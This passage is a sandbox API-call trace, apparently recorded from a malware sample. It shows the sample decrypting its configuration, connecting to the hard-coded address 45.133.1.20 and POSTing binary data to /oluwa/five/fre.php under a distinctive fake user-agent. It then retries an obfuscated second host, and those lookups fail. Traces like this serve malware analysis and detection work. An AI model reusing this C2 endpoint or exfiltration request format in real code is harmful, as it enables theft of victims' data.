HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0162.609] GetProcessHeap () returned 0x6a0000 [0162.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.609] GetProcessHeap () returned 0x6a0000 [0162.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0162.610] GetProcessHeap () returned 0x6a0000 [0162.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0162.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0162.627] GetProcessHeap () returned 0x6a0000 [0162.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0162.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.628] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0162.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.629] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.630] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.630] GetProcessHeap () returned 0x6a0000 [0162.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0162.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.631] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0162.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.632] CryptDestroyKey (hKey=0x6ad020) returned 1 [0162.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.633] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0162.633] GetProcessHeap () returned 0x6a0000 [0162.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.634] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0162.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.635] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0162.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.639] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0162.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.641] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0162.641] GetProcessHeap () returned 0x6a0000 [0162.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0162.641] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0162.641] GetProcessHeap () returned 0x6a0000 [0162.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0162.641] socket (af=2, type=1, protocol=6) returned 0x2cc [0162.642] connect (s=0x2cc, name=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0162.717] FreeAddrInfoW (pAddrInfo=0x6b9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0162.717] GetProcessHeap () returned 0x6a0000 [0162.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0162.718] GetProcessHeap () returned 0x6a0000 [0162.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0162.718] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.719] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0162.719] GetProcessHeap () returned 0x6a0000 [0162.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0162.719] GetProcessHeap () returned 0x6a0000 [0162.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.720] GetProcessHeap () returned 0x6a0000 [0162.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0162.720] GetProcessHeap () returned 0x6a0000 [0162.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0162.721] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.722] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0162.722] GetProcessHeap () returned 0x6a0000 [0162.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0162.722] GetProcessHeap () returned 0x6a0000 [0162.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.723] send (s=0x2cc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0162.723] send (s=0x2cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0162.723] GetProcessHeap () returned 0x6a0000 [0162.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0162.723] recv (in: s=0x2cc, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0162.808] GetProcessHeap () returned 0x6a0000 [0162.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0162.809] GetProcessHeap () returned 0x6a0000 [0162.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0162.809] GetProcessHeap () returned 0x6a0000 [0162.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0162.810] GetProcessHeap () returned 0x6a0000 [0162.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0162.810] closesocket (s=0x2cc) returned 0 [0162.811] GetProcessHeap () returned 0x6a0000 [0162.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0162.811] GetProcessHeap () returned 0x6a0000 [0162.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.811] GetProcessHeap () returned 0x6a0000 [0162.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0162.812] GetProcessHeap () returned 0x6a0000 [0162.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0162.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x30c) returned 0x2cc [0162.816] Sleep (dwMilliseconds=0xea60) [0162.817] GetProcessHeap () returned 0x6a0000 [0162.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0162.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.819] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0162.854] GetProcessHeap () returned 0x6a0000 [0162.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0162.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.855] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0162.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.856] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.857] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.857] GetProcessHeap () returned 0x6a0000 [0162.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0162.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.859] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0162.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.860] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0162.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.861] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0162.861] GetProcessHeap () returned 0x6a0000 [0162.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.876] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.877] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.878] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.879] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.879] GetProcessHeap () returned 0x6a0000 [0162.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0162.879] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0162.879] GetProcessHeap () returned 0x6a0000 [0162.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0162.880] GetProcessHeap () returned 0x6a0000 [0162.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.880] GetProcessHeap () returned 0x6a0000 [0162.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0162.881] GetProcessHeap () returned 0x6a0000 [0162.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0162.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0162.896] GetProcessHeap () returned 0x6a0000 [0162.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0162.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.898] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0162.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.899] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.900] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.900] GetProcessHeap () returned 0x6a0000 [0162.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0162.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.901] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0162.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.902] CryptDestroyKey (hKey=0x6ad020) returned 1 [0162.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.904] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0162.904] GetProcessHeap () returned 0x6a0000 [0162.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.906] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0162.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.909] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0162.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.911] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0162.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.914] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0162.914] GetProcessHeap () returned 0x6a0000 [0162.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0162.914] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0162.914] GetProcessHeap () returned 0x6a0000 [0162.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0162.914] socket (af=2, type=1, protocol=6) returned 0x2d0 [0162.915] connect (s=0x2d0, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0162.941] FreeAddrInfoW (pAddrInfo=0x6b9d70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0162.941] GetProcessHeap () returned 0x6a0000 [0162.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0162.941] GetProcessHeap () returned 0x6a0000 [0162.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0162.942] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.943] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0162.943] GetProcessHeap () returned 0x6a0000 [0162.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0162.943] GetProcessHeap () returned 0x6a0000 [0162.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0162.943] GetProcessHeap () returned 0x6a0000 [0162.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0162.944] GetProcessHeap () returned 0x6a0000 [0162.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0162.944] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.945] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0162.945] GetProcessHeap () returned 0x6a0000 [0162.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0162.945] GetProcessHeap () returned 0x6a0000 [0162.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0162.946] send (s=0x2d0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0162.946] send (s=0x2d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0162.946] GetProcessHeap () returned 0x6a0000 [0162.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0162.946] recv (in: s=0x2d0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0163.023] GetProcessHeap () returned 0x6a0000 [0163.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0163.023] GetProcessHeap () returned 0x6a0000 [0163.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0163.024] GetProcessHeap () returned 0x6a0000 [0163.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0163.025] GetProcessHeap () returned 0x6a0000 [0163.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0163.025] closesocket (s=0x2d0) returned 0 [0163.025] GetProcessHeap () returned 0x6a0000 [0163.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0163.025] GetProcessHeap () returned 0x6a0000 [0163.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.026] GetProcessHeap () returned 0x6a0000 [0163.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0163.026] GetProcessHeap () returned 0x6a0000 [0163.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0163.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13ec) returned 0x2d0 [0163.030] Sleep (dwMilliseconds=0xea60) [0163.032] GetProcessHeap () returned 0x6a0000 [0163.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0163.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.033] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0163.050] GetProcessHeap () returned 0x6a0000 [0163.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0163.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.051] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0163.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.052] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0163.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.053] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.053] GetProcessHeap () returned 0x6a0000 [0163.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0163.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.055] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0163.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.057] CryptDestroyKey (hKey=0x6ad520) returned 1 [0163.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.058] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0163.058] GetProcessHeap () returned 0x6a0000 [0163.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.066] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0163.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.068] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0163.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.069] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0163.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.070] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0163.070] GetProcessHeap () returned 0x6a0000 [0163.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0163.070] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0163.071] GetProcessHeap () returned 0x6a0000 [0163.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0163.071] GetProcessHeap () returned 0x6a0000 [0163.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0163.072] GetProcessHeap () returned 0x6a0000 [0163.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0163.072] GetProcessHeap () returned 0x6a0000 [0163.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0163.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0163.082] LoadLibraryW (lpLibFileName="ADVAPI32") 